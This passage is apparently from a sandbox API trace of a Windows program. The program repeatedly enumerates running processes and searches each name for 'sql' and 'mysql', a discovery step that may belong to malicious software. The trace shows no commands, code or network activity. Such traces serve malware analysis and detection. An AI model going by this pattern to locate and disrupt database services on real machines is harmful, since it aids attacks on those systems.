th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0176.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.829] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595888 [0176.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3595888, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0176.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0176.829] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0176.829] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.866] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585588 [0176.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0176.867] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0176.867] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.868] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585468 [0176.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.868] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0176.868] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0176.868] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0176.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.869] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585498 [0176.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3585498, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0176.869] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0176.869] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0176.869] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.870] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585480 [0176.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3585480, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0176.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0176.871] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0176.871] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0176.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.872] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595d28 [0176.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3595d28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0176.872] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0176.872] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0176.872] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0176.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.873] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585408 [0176.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3585408, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0176.873] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0176.873] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0176.873] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0176.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.874] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586ac0 [0176.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x3586ac0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sc.exe", lpUsedDefaultChar=0x0) returned 7 [0176.875] lstrcpyA (in: lpString1=0x567fabc, lpString2="sc.exe" | out: lpString1="sc.exe") returned="sc.exe" [0176.875] StrStrIA (lpFirst="sc.exe", lpSrch="sql") returned 0x0 [0176.875] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0176.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.876] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35856a8 [0176.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x35856a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIADAP.exe", lpUsedDefaultChar=0x0) returned 12 [0176.876] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0176.876] StrStrIA (lpFirst="WMIADAP.exe", lpSrch="sql") returned 0x0 [0176.876] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1158, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.877] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35855a0 [0176.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35855a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.877] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0176.877] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0176.877] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.878] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35855b8 [0176.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35855b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.879] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.879] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0176.879] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0176.879] CloseHandle (hObject=0x370) returned 1 [0176.880] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x3b8 [0176.896] Process32FirstW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.897] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595d88 [0176.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3595d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0176.897] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0176.897] StrStrIA (lpFirst="[System Process]", lpSrch="mysql") returned 0x0 [0176.897] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0176.899] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586b40 [0176.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3586b40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0176.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0176.899] StrStrIA (lpFirst="System", lpSrch="mysql") returned 0x0 [0176.899] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0176.900] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35854b0 [0176.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35854b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0176.900] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0176.900] StrStrIA (lpFirst="smss.exe", lpSrch="mysql") returned 0x0 [0176.901] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.902] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3585540 [0176.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3585540, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0176.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0176.902] StrStrIA (lpFirst="csrss.exe", lpSrch="mysql") returned 0x0 [0176.902] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.903] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35854f8 [0176.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35854f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0176.904] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0176.904] StrStrIA (lpFirst="wininit.exe", lpSrch="mysql") returned 0x0 [0176.904] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.905] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35854c8 [0176.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35854c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0176.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0176.905] StrStrIA (lpFirst="csrss.exe", lpSrch="mysql") returned 0x0 [0176.905] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.906] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35855e8 [0176.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35855e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0176.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0176.906] StrStrIA (lpFirst="winlogon.exe", lpSrch="mysql") returned 0x0 [0176.906] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.908] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585600 [0176.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3585600, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0176.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0176.908] StrStrIA (lpFirst="services.exe", lpSrch="mysql") returned 0x0 [0176.908] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.953] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35854e0 [0176.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35854e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0176.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0176.953] StrStrIA (lpFirst="lsass.exe", lpSrch="mysql") returned 0x0 [0176.953] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.955] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35856c0 [0176.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35856c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0176.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0176.955] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0176.955] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.956] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3585510 [0176.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585510, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0176.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0176.956] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="mysql") returned 0x0 [0176.956] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.958] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3585618 [0176.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3585618, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0176.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" 